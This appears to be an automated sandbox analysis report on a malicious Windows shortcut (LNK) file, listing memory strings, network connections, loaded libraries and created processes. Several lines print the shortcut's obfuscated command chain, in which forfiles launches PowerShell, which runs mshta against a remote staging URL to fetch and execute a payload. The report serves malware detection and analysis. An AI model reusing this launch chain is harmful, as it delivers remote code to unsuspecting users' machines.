Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/js/dist/hooks.min.js?ver=4169d3cf8e8d95a3d6d5
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/js/dist/i18n.min.js?ver=9e794f35a71bb98672ae
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/js/hoverIntent.min.js?ver=1.10.2
Source: mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.1
Source: mshta.exe, 00000004.00000002.3290475443.0000013470330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.1-shop.css?ver=3.17.57
Source: mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290562334.000001347039C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.1C:
Source: mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.1G
Source: mshta.exe, 00000004.00000002.3291302874.00000134705F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.1S
Source: mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.1m
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/js/zxcvbn-async.min.js?ver=1.0
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E115000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347036E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E179000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/wlwmanifest.xml
Source: mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-json/
Source: mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/xmlrpc.php
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E115000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347036E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E179000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/xmlrpc.php?rsd
Source: mshta.exe, 00000004.00000002.3291040038.0000013470535000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.uaNatK($&
Source: mshta.exe, 00000004.00000003.2284077805.0000013470415000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.dunjquery/jquery.min.js?ver=3.6.1ugins/woo-discount-rules/v2/Assetsss/customize-tp
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E14F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: qmgr.db.7.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
Source: mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://schema.org
Source: mshta.exe, 00000004.00000002.3291302874.00000134705F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-PTB9RGG
Source: mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.morkva.co.ua?utm_source=client-site&utm_medium=client-footer-link
Source: front[1].css.4.drString found in binary or memory: https://www.svgrepo.com/vectors/search/4
Source: mshta.exe, 00000004.00000002.3290590957.0000013470411000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.0000013470411000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.0000013470411000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownHTTPS traffic detected: 185.68.16.189:443 -> 192.168.2.5:49704 version: TLS 1.2

System Summary

barindex
Windows shortcut file (LNK) contains suspicious command line arguments
Source: sbOq2d6k2t.lnkLNK file: /p C:\ /m Windows /c "powershell . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal68.winLNK@7/39@1/2
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_relhfqw2.1yu.ps1Jump to behavior
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\forfiles.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: sbOq2d6k2t.lnkReversingLabs: Detection: 18%
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p C:\ /m Windows /c "powershell . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Jump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: sbOq2d6k2t.lnkLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
